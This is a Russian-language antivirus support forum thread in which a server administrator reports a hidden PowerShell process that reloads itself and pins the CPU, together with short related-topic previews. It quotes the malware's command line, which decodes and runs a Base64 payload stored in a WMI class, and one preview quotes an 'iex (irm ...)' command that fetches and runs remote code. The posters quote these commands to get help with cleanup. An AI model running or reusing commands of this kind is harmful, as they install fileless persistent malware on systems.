Перейти к содержанию
Правила раздела

Powershell загружает серверы на 100%

ChillingTouch

Автор ChillingTouch
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

ChillingTouch

ChillingTouch

Опубликовано
Опубликовано

Оформлен инцидент INC000008415373, в двух словах продублирую здесь.

 

На серверах с всевозможными версиями Windows Server обнаруживается работающий процесс powershell, грузящий процессор на 100%. Если процесс убить, то он потом снова запускается. Командные строки процессов отличаются, но типа этого:

powershell -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:Win32_TaskService').Properties['mon'].Value; $funs = ([WmiClas*] 'root\default:Win32_TaskService').Properties['funs'].Value ; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))); Invoke-Command  -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

После загрузки системы в безопасном режиме и сканирования с помощью KVRT находится в System Memory и удаляется Trojan.Multi.GenAutorunWMI.a, после перезагрузки всё вроде бы нормально.

 

На серверах установлен KSWS 10.0.0.486, посоветуйте, где что настроить, чтобы избежать повторных случаев.

Sandor

Sandor

Опубликовано
Опубликовано (изменено)

Здравствуйте!

 

Дождитесь ответа ТП. Одновременное лечение в разных местах только сбивает с толку консультантов.

Изменено пользователем Sandor
kmscom

kmscom

Опубликовано
Опубликовано

Этот раздел посвящен уничтожению вирусов, в соответствии с правилами раздела вы должны внимательно прочитать и аккуратно выполнить указания в теме «Порядок оформления запроса о помощи».
Если ваш вопрос не касается этого раздела, то ваша тема будет перенесена в раздел Помощь по продуктам Лаборатории Касперского

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Кашапова Алина
      [РЕШЕНО] Вирус powershell AVKill 10
      Автор Кашапова Алина
      Здравствуйте. Подхватила вирус, источник неизвестен, но возможно вместе с торрентом. Ноутбук сильно шумит и греется, диспетчер задач показывает загруженность ЦП 100%. Cureit сначала указывал на файлы dialer.exe в \net\18308\tcp, после перезагрузки их не видит, но нашел powershell AVKill 10. Удалить файлы не получается. Заранее благодарю за помощь.
      CollectionLog-2025.09.01-01.06.zip
    • Alexoon
      вирус powershell
      Автор Alexoon
      Подхватил какой-то вирус с почты. Постоянно открывается powershell и браузеры, т.е. по 5 раз в секунду
       
      Антивирусы ни один его не видят
      CollectionLog-2025.08.22-16.02.zip
    • Andrei93
      Как исправить причину блокировки выполнения скрипта ?
      Автор Andrei93
      Здравствуйте.
       
      Я выполняю powershell скрипт с помощью планировщика задач от системы
       
      1. Скрипт подписан сертификатом.
      2. Скрипт выполняет установку msi плагина для Outlook.
       
      KSC считает, что это троян.
       
      - По какой причине ?
      - Как правильно разрешить мою проблему ?
       
      Kasperskiy Endpoint Security: 12.3.0.493
       
       
       


    • SimpleMan
      Помогите устранить вирус который засел в PowerShell
      Автор SimpleMan
      Недавно активировал Windows 11 Pro через командную строку cmd, через какой-то левый KMS сервер, не разобрался как это работает, 
      проработал так несколько дней, потом решил установить антивирус Касперского и он сразу же обнаружил Вредоносные ссылки через PowerShell 
      пример такой активаций есть везде, вот: https://vk.com/wall-188198781_5982
      Подскажите пожалуйста, как теперь устранить проблему?
      скриншот отчёта прилагаю
       
    • VanyeJ
      Вирус в PowerShell
      Автор VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...